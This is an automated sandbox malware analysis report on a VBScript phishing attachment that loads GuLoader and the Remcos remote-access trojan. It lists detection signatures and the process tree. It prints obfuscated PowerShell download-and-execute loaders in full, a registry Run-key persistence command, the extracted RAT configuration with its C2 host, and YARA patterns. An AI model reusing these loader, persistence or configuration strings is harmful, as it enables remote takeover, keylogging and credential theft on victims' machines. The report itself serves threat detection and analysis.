Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_MG2027176.vbs

Overview

General Information

Sample name:Order_MG2027176.vbs
Analysis ID:1538692
MD5:f0b294ee638bb4d395cd75451e71a6b6
SHA1:8bf584b1806091823b343cd6b49f369258a44d23
SHA256:a5eb3dd84918b7e65d9d2193775aeda26375c600c089dad2eecb9259c7b0dcc2
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5928 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 5912 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5308 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 6516 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3324 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 6700 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1976 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6588 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6192 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "50", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N1P6UN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_5976.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_5308.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc34f:$b2: ::FromBase64String(
                • 0xb3d3:$s1: -join
                • 0x4b7f:$s4: +=
                • 0x4c41:$s4: +=
                • 0x8e68:$s4: +=
                • 0xaf85:$s4: +=
                • 0xb26f:$s4: +=
                • 0xb3b5:$s4: +=
                • 0x15116:$s4: +=
                • 0x15196:$s4: +=
                • 0x1525c:$s4: +=
                • 0x152dc:$s4: +=
                • 0x154b2:$s4: +=
                • 0x15536:$s4: +=
                • 0xbbf4:$e4: Get-WmiObject
                • 0xbde3:$e4: Get-Process
                • 0xbe3b:$e4: Start-Process
                • 0x15df7:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", ProcessId: 5928, ProcessName: wscript.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Leavy
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", ProcessId: 3324, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.113.96, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4064, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49716
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4064, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD 